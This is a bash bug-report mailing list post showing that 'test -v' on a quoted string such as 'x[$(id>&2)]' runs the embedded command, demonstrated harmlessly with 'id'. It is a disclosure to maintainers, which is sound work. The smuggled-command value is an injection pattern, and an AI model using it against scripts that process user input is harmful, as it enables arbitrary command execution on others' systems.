bug-bash
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Arbitrary command execution from test on a quoted string


From: elettrino
Subject: Arbitrary command execution from test on a quoted string
Date: Thu, 28 Oct 2021 20:33:22 +0000

The following shows an example of bash testing a quoted string and as a result 
executing a command embedded in the string.

Here I used the command "id" to stand as an example of a command. The output of 
id on this machine was as follows:

user@machine:~$ id
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

So to demonstrate:

user@machine:~$ USER_INPUT='x[$(id>&2)]'
user@machine:~$ test -v "$USER_INPUT"
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

This means that if variable USER_INPUT was indeed input from a user, the user 
could execute an arbitrary command.

Also unexpected (and presumably related), bash is expanding the construct 
inside single quote marks:

user@machine:~$ test -v 'x[$(id>&2)]'
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$

user@machine:~$ echo $BASH_VERSION
4.4.20(1)-release
user@machine:~$

I don't know whether this happens with anything other than the -v option with 
test; I have not seen it happen under any other circumstance.

Sent with [ProtonMail](https://protonmail.com) Secure Email.

reply via email to

[Prev in Thread] Current Thread [Next in Thread]